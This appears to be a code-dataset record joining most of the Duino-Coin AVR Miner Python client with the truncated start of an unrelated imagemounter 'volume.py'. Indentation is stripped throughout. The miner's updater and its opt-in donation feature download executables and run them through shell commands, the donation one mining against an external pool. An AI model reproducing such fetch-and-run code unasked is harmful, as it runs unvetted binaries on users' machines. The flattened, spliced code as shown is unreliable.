config["AVR Miner"] = {
'username': config["AVR Miner"]['username'],
'avrport': config["AVR Miner"]['avrport'],
'donate': int(config["AVR Miner"]['donate']),
'language': config["AVR Miner"]['language'],
'identifier': config["AVR Miner"]['identifier'],
'debug': config["AVR Miner"]['debug'],
"soc_timeout": int(config["AVR Miner"]["soc_timeout"]),
"avr_timeout": float(config["AVR Miner"]["avr_timeout"]),
"discord_presence": config["AVR Miner"]["discord_presence"],
"periodic_report": int(config["AVR Miner"]["periodic_report"]),
"shuffle_ports": config["AVR Miner"]["shuffle_ports"],
"mining_key": config["AVR Miner"]["mining_key"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
print(Style.RESET_ALL + get_string('config_saved'))
except Exception as e:
print(Style.BRIGHT + "There is a error trying to save the config file: " + str(e))
print("The config file isn't saved on the new version folder")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "AVR_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/AVR_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
print("Saving to", os.path.abspath(file_path))
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
print("\nDownload complete!")
if not running_script:
print("Unpacking...")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "AVR_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "AVR_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "AVR_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
print("Unpacking complete!")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\AVR_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/AVR_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
print("Download failed: status code {}\n{}".format(r.status_code, r.text))
else:
print("Update aborted!")
else:
print("The Miner is up to date")
except Exception as e:
print(e)
sys.exit()
def check_mining_key(user_settings):
user_settings = user_settings["AVR Miner"]
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ "&k=" + key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
"sys0",
get_string("mining_key_required"),
"warning")
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
pretty_print(
"sys0",
get_string("invalid_mining_key"),
"error")
retry = input("You want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
return
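# Note: the mining key is stored base64-encoded in Settings.cfg; for example a
# key "mysecret" would be saved as "bXlzZWNyZXQ=" (illustrative value, not a
# real key) and decoded with b64.b64decode() before being sent to the server.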
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", get_string("connection_search"),
"info")
try:
response = requests.get(
"https://maxteal.github.io/getpool.html",
timeout=10).json()
if response["success"] == True:
pretty_print("net0", get_string("connecting_node")
+ response["name"],
"info")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print("net0", get_string("node_picker_unavailable")
+ f"15s {Style.RESET_ALL}({e})",
"warning")
else:
pretty_print("net0", get_string("node_picker_error")
+ f"15s {Style.RESET_ALL}({e})",
"error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*3}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*3}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'error')
shares = [0, 0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url, timeout=5)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
elif locale.startswith('ko'):
lang = 'korean'
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
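# Illustrative conversions with the function above (values chosen for example):
#   get_prefix("H/s", 1_000, 2)     -> "1 kH/s"
#   get_prefix("H/s", 1_230_000, 2) -> "1.23 MH/s"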
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
try:
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
except Exception as e:
print(e)
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
mining_key = input(Style.RESET_ALL + Fore.YELLOW
+ get_string("ask_mining_key")
+ Fore.RESET + Style.BRIGHT)
if not mining_key:
mining_key = "None"
else:
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 7,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y",
"mining_key": mining_key}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2022')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
print("Error updating Discord RPC thread: " + str(e))
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
    HH:MM:SS |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
else:
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
    HH:MM:SS |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.MAGENTA
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
last_report_share = 0
while True:
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
if config["AVR Miner"]["mining_key"] != "None":
key = b64.b64decode(config["AVR Miner"]["mining_key"]).decode()
else:
key = config["AVR Miner"]["mining_key"]
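                # The request below is "JOB<sep>username<sep>AVR<sep>key"; the reply is
                # split on the same separator into job[0], job[1] and job[2] (the share
                # difficulty, parsed as an int just below).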
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR'
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
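            # Serial exchange with the board: the three job fields are written as one
            # separator-terminated string, and the AVR answers with a comma-separated
            # line whose first two fields are base-2 encoded (see int(..., 2) below);
            # the third field is forwarded to the node together with the share.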
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
if retry_counter > 3:
break
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
responsetimetart = now()
feedback = Client.recv(s, 64).split(",")
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {" ".join(feedback)}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
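            # feedback[0] from the node decides how the share is counted:
            # GOOD -> accepted, BLOCK -> accepted and block found, BAD -> rejected
            # (reject reason in feedback[1]); anything else is shown as a rejected
            # share with the raw feedback attached.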
if feedback[0] == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BLOCK':
shares[0] += 1
shares[2] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BAD':
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback[1])
printlock.release()
else:
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - last_report_share
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
shares[2], hashrate, uptime)
start_time = time()
last_report_share = shares[0]
def periodic_report(start_time, end_time, shares,
block, hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body7') + str(block)
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime >= 7200: # 2 hours, plural
return str(uptime // 3600) + get_string('uptime_hours')
elif uptime >= 3600: # 1 hour, not plural
return str(uptime // 3600) + get_string('uptime_hour')
elif uptime >= 120: # 2 minutes, plural
return str(uptime // 60) + get_string('uptime_minutes')
elif uptime >= 60: # 1 minute, not plural
return str(uptime // 60) + get_string('uptime_minute')
else: # less than 1 minute
return str(round(uptime)) + get_string('uptime_seconds')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
try:
check_mining_key(config)
except Exception as e:
debug_output(f'Error checking miner key: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
volume.py
|
import collections
import io
import logging
import os
import subprocess
import re
import tempfile
import threading
import shutil
import warnings
from imagemounter import _util, filesystems, FILE_SYSTEM_TYPES, VOLUME_SYSTEM_TYPES, dependencies
from imagemounter.exceptions import NoMountpointAvailableError, SubsystemError, \
NoLoopbackAvailableError, NotMountedError, \
ImageMounterError
from imagemounter.volume_system import VolumeSystem
logger = logging.getLogger(__name__)
class Volume(object):
"""Information about a volume. Note that every detected volume gets their own Volume object, though it may or may
not be mounted. This can be seen through the :attr:`mountpoint` attribute -- if it is not set, perhaps the
:attr:`exception` attribute is set with an exception.
"""
def __init__(self, disk, parent=None, index="0", size=0, offset=0, flag='alloc', slot=0, fstype=None, key="",
vstype='', volume_detector='auto'):
"""Creates a Volume object that is not mounted yet.
Only use arguments as keyword arguments.
:param disk: the parent disk
:type disk: :class:`Disk`
:param parent: the parent volume or disk.
:param str index: the volume index within its volume system, see the attribute documentation.
:param int size: the volume size, see the attribute documentation.
:param int offset: the volume offset, see the attribute documentation.
:param str flag: the volume flag, see the attribute documentation.
:param int slot: the volume slot, see the attribute documentation.
:param FileSystem fstype: the fstype you wish to use for this Volume.
If not specified, will be retrieved from the ImageParser instance instead.
:param str key: the key to use for this Volume.
:param str vstype: the volume system type to use.
:param str volume_detector: the volume system detection method to use
"""
self.parent = parent
self.disk = disk
# Should be filled somewhere
self.size = size
self.offset = offset
self.index = index
self.slot = slot
self.flag = flag
self.block_size = self.disk.block_size
self.volumes = VolumeSystem(parent=self, vstype=vstype, volume_detector=volume_detector)
self._get_fstype_from_parser(fstype)
if key:
self.key = key
elif self.index in self.disk.parser.keys:
self.key = self.disk.parser.keys[self.index]
elif '*' in self.disk.parser.keys:
self.key = self.disk.parser.keys['*']
else:
self.key = ""
self.info = {}
self._paths = {}
self.mountpoint = ""
self.loopback = ""
self.was_mounted = False
self.is_mounted = False
def __unicode__(self):
return '{0}:{1}'.format(self.index, self.info.get('fsdescription') or '-')
def __str__(self):
return str(self.__unicode__())
def __getitem__(self, item):
return self.volumes[item]
@property
def numeric_index(self):
try:
